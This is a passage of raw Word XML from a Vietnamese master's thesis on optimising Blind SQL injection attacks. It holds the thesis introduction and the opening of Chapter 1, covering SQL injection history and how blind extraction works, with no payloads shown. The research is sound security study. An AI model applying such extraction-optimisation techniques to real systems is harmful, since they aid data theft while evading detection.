                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>DDS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6363" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00501C5D" w:rsidRPr="002B0849" w:rsidRDefault="00501C5D" w:rsidP="00FB61E3">
            <w:pPr>
              <w:suppressAutoHyphens w:val="0"/>
              <w:spacing w:line="252" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002B0849">
              <w:rPr>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>Domain Driven Security</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HTML</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Markup Language</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HTTP</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Transfer Protocol</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HTTPS</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Transfer Protocol Secure</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JSP</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Java Server Pages</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LTV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6363" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00501C5D" w:rsidRPr="002B0849" w:rsidRDefault="00A675EA">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Lập trình viên</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OWASP</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Open Web Application Security Project</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PHP</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PHP: Hypertext Preprocessor</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SQL</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Structured Query Language</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 RI</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Uniform Resource Identifier</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501C5D" w:rsidRPr="002B0849" w:rsidTr="0058383C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="828" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00501C5D" w:rsidRPr="002B0849" w:rsidRDefault="00501C5D" w:rsidP="002B0849">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="20"/>
              </w:numPr>
              <w:suppressAutoHyphens w:val="0"/>
              <w:spacing w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2430" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00501C5D" w:rsidRPr="002B0849" w:rsidRDefault="00501C5D">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 RL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6363" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00501C5D" w:rsidRPr="002B0849" w:rsidRDefault="00F5471C">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Uniform Resource Locator</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="003E0ED1" w:rsidRDefault="003E0ED1">
      <w:pPr>
        <w:suppressAutoHyphens w:val="0"/>
        <w:spacing w:line="252" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005E4E83" w:rsidRDefault="005E4E83">
      <w:pPr>
        <w:suppressAutoHyphens w:val="0"/>
        <w:spacing w:line="252" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E0ED1" w:rsidRPr="0058383C" w:rsidRDefault="0058383C" w:rsidP="003E0ED1">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc459374306"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>LỜI MỞ ĐẦU</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w:rsidR="00EE08FC" w:rsidRPr="001604F9" w:rsidRDefault="00EE08FC" w:rsidP="007D72F3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001604F9">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
        <w:t>Ngày nay, công nghệ thông tin trở thành phần quan trọng, thiết yếu trong các hoạt động sản xuất kinh doanh, quản lý hành chính. Ứng dụng công nghệ thông tin đi tới từng hoạt động, công việc dù là nhỏ nhất. Trong đó, môi trường ứng dụng web được sử dụng nhiều nhất, vì tính tiện dụng, dễ dàng, không yêu cầu cài đặt, triển khai khó khăn phía người dùng cuối.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE08FC" w:rsidRPr="001604F9" w:rsidRDefault="00EE08FC" w:rsidP="00EE08FC">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001604F9">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
        <w:t>Tuy nhiên, ứng dụng web luôn phải đối mặt với những nguy cơ mất an toàn thông tin. Nguyên nhân có thể xuất phát từ lỗi lập trình, lỗi khi triển khai, cài đặt ứng dụng, lỗi khi vận hành, khai thác ứng dụng. Những lỗi này có thể tạo điều kiện cho kẻ tấn công khai thác, chiếm quyền điều khiển ứng dụng và máy chủ, gây ảnh hưởng lớn tới công ty, doanh nghiệp, hoạt động sản xuất kinh doanh. Việc sử dụng những phần mềm, ứng dụng không an toàn đã làm hao tổn nhiều chi phí cho các ngành tài chính, y tế, năng lượng.. và nhiều cơ sở hạ tầng quan trọng khác. Khi mà các hệ thống số của chúng ta ngày càng sở nên phức tạp và liên thông, việc bảo vệ nó cũng trở nên khó khăn hơn gấp nhiều lần.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE08FC" w:rsidRPr="001604F9" w:rsidRDefault="00EE08FC" w:rsidP="00EE08FC">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001604F9">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
        <w:t>Diện mạo những mối nguy cơ về ứng dụng web trên Internet thay đổi một cách liên tục. Nguyên nhân chính về sự phát triển này là sự tiến bộ của kẻ tấn công, sự ra đời của những công nghệ mới, và sự thiết  lập của những hệ thống ngày một phức tạp. Để theo kịp tốc độ đó, hàng năm tổ chức OWASP (Open Web Application Security Project – dự án mở về bảo mật ứng dụng web) đều cập nhật, đưa ra tài liệu OWASP Top 10, là tài liệu trình bày về top 10 rủi ro an ninh của ứng dụng web.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE08FC" w:rsidRPr="001604F9" w:rsidRDefault="00EE08FC" w:rsidP="00EE08FC">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001604F9">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
        <w:t>Đứng đầu trong danh sách 10 rủi ro an toàn thông tin của ứng dụng web này chính là lỗi nhũng mã: Injection. Xảy ra trong các ứng dụng như  SQL, LDAP khi những dữ liệu không xác thực được gửi đến hệ thống, biên dịch như một phần của mã lệnh. Những dữ liệu này của kẻ tấn công có thể lừa hệ thống biên dịch thực hiện những mã lệnh độc hại hoặc giúp kẻ tấn công xâm nhập đến những dữ liệu quan trọng một cách trái phép.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE08FC" w:rsidRPr="001604F9" w:rsidRDefault="00EE08FC" w:rsidP="00EE08FC">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001604F9">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Tấn công nhúng mã SQL, hay còn được gọi là SQL injection, là dạng tấn công phổ biến nhất của tấn công nhúng mã. Tấn công này tập trung vào đối tượng là các cơ sở dữ liệu SQL.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001604F9">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
        <w:t>Được coi là trái tim của toàn bộ hệ thống, cơ sở dữ liệu chính là mục tiêu của hầu hết các cuộc tấn công mạng. Khai thác lỗi SQL injection, kẻ tấn công có thể khiến hệ thống mất mát dữ liệu, hư hỏng hoặc không thể kiểm tra hay truy cập đến dữ liệu. Năng hơn có thể dẫn đến toàn bộ hệ thống bị chiếm quyền.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE08FC" w:rsidRPr="001604F9" w:rsidRDefault="00EE08FC" w:rsidP="00EE08FC">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001604F9">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve">Đối với ứng dụng web, ai cũng có thể gửi các dữ liệu không tin cập đến hệ thống: bao gồm người dùng bên ngoài, nội bộ, hay quản trị viên. Kẻ tấn công có thể gửi những mã tấn công dạng văn bản, khai thac sơ hở trong cú pháp truy vấn SQL. Bằng cách nhúng các mã SQL query/command vào đầu vào từ người dùng, trước khi chuyển cho ứng dụng web xử lý, kẻ tấn công có thể buộc ứng dụng thực thi đoạn mã SQL đó, từ đó có thể chiếm quyền điều khiển ứng dụng và máy chủ </w:t>
      </w:r>
      <w:r w:rsidRPr="001604F9">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:vertAlign w:val="superscript"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
        <w:t>[1][4]</w:t>
      </w:r>
      <w:r w:rsidRPr="001604F9">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE08FC" w:rsidRDefault="00EE08FC" w:rsidP="00EE08FC">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Trong các dạng tấn công SQL injection, Blind SQL injection là dạng rất phổ biến. Tấn công này sẽ phân tích nội dung trả về để xác định kết quả câu truy vấn được gửi đến ứng dụng web thực thi, để từ đó biết được kết quả câu truy vấn là đúng hay là sai. Có 02 kiểu phân tích phổ biến là: Boolean base (dựa vào nội dung trả về là đúng hay sai) và Time base (dựa trên thời gian trả về) </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76F3">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>[2]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE08FC" w:rsidRDefault="00EE08FC" w:rsidP="00EE08FC">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Phương pháp khai thác lỗ hổng Blind SQL injection truyền thống sẽ tấn công vét cạn, lần lượt gửi các yêu cầu truy vấn để hỏi ký tự cần lấy có phải là ký tự trong bảng mã ASCII hay không. Bảng mã ASCII có 256 ký tự, trong đó có khoảng 128 ký dạng dạng có thể in được (printable character) do đó yêu cầu phải sử dụng đến 128 lần gửi yêu cầu để có thể lấy về một ký tự </w:t>
      </w:r>
      <w:r w:rsidRPr="00A90460">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>[5]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>. Điều này làm tiêu tốn nhiều thời gian, băng thông cho một cuộc tấn công, do đó, dễ dàng cho phép các hệ thống phát hiện xâm nhập IDS phát hiện.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE08FC" w:rsidRPr="00331730" w:rsidRDefault="00EE08FC" w:rsidP="00EE08FC">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Ngày nay, trên thế giới liên tục có các nghiên cứu nhằm mục tiêu tối ưu hóa tấn công Blind SQL injection, mục tiêu giảm số lượng yêu cầu cần gửi </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">xuống tối đa có thể.  </w:t>
      </w:r>
      <w:r w:rsidRPr="003710C8">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">Hầu hết các kỹ thuật </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">tối ưu </w:t>
      </w:r>
      <w:r w:rsidRPr="003710C8">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>hiện</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> có trên thế giới cho phép với 7 lần yêu cầu có thể lấy về một ký tự </w:t>
      </w:r>
      <w:r w:rsidRPr="00A90460">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>[7]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, có nghĩa là giảm hơn 18 lần so với phương pháp truyền thống</w:t>
      </w:r>
      <w:r w:rsidRPr="003710C8">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE08FC" w:rsidRDefault="00EE08FC" w:rsidP="00781B18">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Với mục đích tối ưu hóa tấn công Blind SQL injection về số lượng yêu cầu cần gửi đi, em lựa chọn đề tài “Nghiên cứu giải pháp tối ưu hóa tấn công Blind SQL injection” làm </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
        <w:t>đề tài</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> luận văn tốt nghiệp thạc sĩ chuyên ngành An toàn thông tin. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
        <w:t>Đề tài l</w:t>
      </w:r>
      <w:r w:rsidRPr="003710C8">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">uận văn </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>sẽ đi sâu vào nghiên cứu, tìm hiểu</w:t>
      </w:r>
      <w:r w:rsidRPr="003710C8">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> mộ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">t </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>kỹ thuật tối ưu hóa mới, dựa vào phân tích thứ tự của dữ liệu trả về để từ đó có thể trích xuất ra dữ liệu mong muốn, giúp tối ưu nữa so với các phương pháp tối ưu hóa hiện có.</w:t>
      </w:r>
      <w:r w:rsidR="00781B18">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> L</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>uận văn đề cập đến một phương pháp mới trong việc tấn công Blind SQL injection. Hiện nay c</w:t>
      </w:r>
      <w:r w:rsidRPr="00C95DA1">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ác phương pháp tấn công Blind SQL injection </w:t>
      </w:r>
      <w:r w:rsidRPr="00752F61">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t xml:space="preserve">[6] </w:t>
      </w:r>
      <w:r w:rsidRPr="00C95DA1">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>thường tận dụng việc phân tích các dạ</w:t>
      </w:r>
      <w:r w:rsidR="009201E8">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ng </w:t>
      </w:r>
      <w:r w:rsidRPr="00C95DA1">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>dữ liệu trả về đơn giản (nội dung cơ bản, thời gian trả về). Các phương pháp này chỉ cho phép trong một lần yêu cầu trả về được hai kết quả (Đúng hoặc sai). Phương pháp được nghiên cứu trong đề tài dựa trên việc phân tích nội dung thứ tự của dữ liệu trả về, từ đó lấy được ra nhiều hơn hai kết quả trả về. Dựa vào đó, giảm số lần yêu cầu xuống, giúp tiết kiệm thời gian, băng thông so với các phương pháp trước đây.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E0ED1" w:rsidRDefault="003E0ED1">
      <w:pPr>
        <w:suppressAutoHyphens w:val="0"/>
        <w:spacing w:line="252" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EE08FC" w:rsidRDefault="00EE08FC">
      <w:pPr>
        <w:suppressAutoHyphens w:val="0"/>
        <w:spacing w:line="252" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="00EE08FC">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc459374307"/>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Chương 1: Tấn công Blind SQL injection.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Lỗ hổng SQL injecton đã tồn tại ngay từ lần đầu tiên ứng dụng web được kết nối với cơ sở dữ liệu. Tuy nhiên, Rain Forest Puppy được coi là người đâu tiên có công bố rộng rãi về lỗ hổng này. Vào ngày giáng sinh năm 1998, Rain Forest Puppy đã viết bài báo “NT Web Technology Vulnerabilities” trên Phrack (</w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:anchor="article" w:history="1">
        <w:r w:rsidRPr="005D3C52">
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
            <w:rFonts w:cs="Times New Roman"/>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:t>www.phrack.com/issues.html?issue=54&amp;id=8#article</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>), một chuyên trang dành cho các hacker trên thế giới. Tác giả cũng cung cấp một bài hướng dẫn tấ</w:t>
      </w:r>
      <w:r w:rsidR="00DB3DB2">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">n công SQL injection </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">tên “How I hacked PacketStorm” tại www.wiretrip.net/rfp/txt/rfp2k01.txt  vào đầu những năm 2000. Kể từ đây, nhiều nhà nghiên cứu trên thế giới đã bắt đầu phát triển các kỹ thuật tấn công, khai thác lỗ hổng SQL injection. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="00E64461">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc459374308"/>
      <w:r w:rsidRPr="005D3C52">
        <w:t>Lỗ hổng SQL injection.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Trong nhiề</w:t>
      </w:r>
      <w:r w:rsidR="005B031B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>u năm qua ngày càng có nhiều những bài báo, nghiên cứu về l</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>ỗ hổng SQL injection</w:t>
      </w:r>
      <w:r w:rsidR="005B031B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">. Đó thường là những bài viết về kinh nghiệm, cách khai thác lỗ hổng này. SQL injection là một trong những lỗ hổng nguy hiểm nhất, ảnh hưởng nghiêm trọng hoạt động kinh doanh, nghiệp vụ của tổ chức. Nó cho phép kẻ tấn công tiếp xúc với những thông tin cực kỳ quan trọng như: thông tin tài khoản, thông tin email, thông tin thẻ tín dụng. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Trong phần này </w:t>
      </w:r>
      <w:r w:rsidR="00550B65">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>luận văn</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> sẽ xem xét nguyên nhân của lỗ hổng. Bắt đầu bằng cái nhìn tổng quan về cấu trúc và hoạt động của ứng dụng web, từ đó cung cấp hiểu biết về cách mà lỗ hổng SQL injection xảy ra dựa trên phân tích mã nguồn của ứng dụng.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc459374309"/>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Nguyên tắc hoạt động của ứng dụng web sử dụng cơ sở dữ liệu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Đại đa số</w:t>
      </w:r>
      <w:r w:rsidR="000B5547">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> mọi người</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> sử dụng các ứng dụng web trong cuộc sống hằng ngày, như là một phần trong cuộc sống như: duyệt email, mua hàng trực tuyến, đọc một tin tức mình quan tâm. Ứng dụng web cũng có đủ loại nội dụng, với đủ loại kích thước khác nhau. Mặc dù khác nhau, đa dạng như vậy nhưng các ứng dụng web lại có một điểm giống nhau cơ bản. Đó chính là cách mà ứng dụng web tương tác. Thông thường, đó chính là cơ sở dữ liệu (CSDL).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
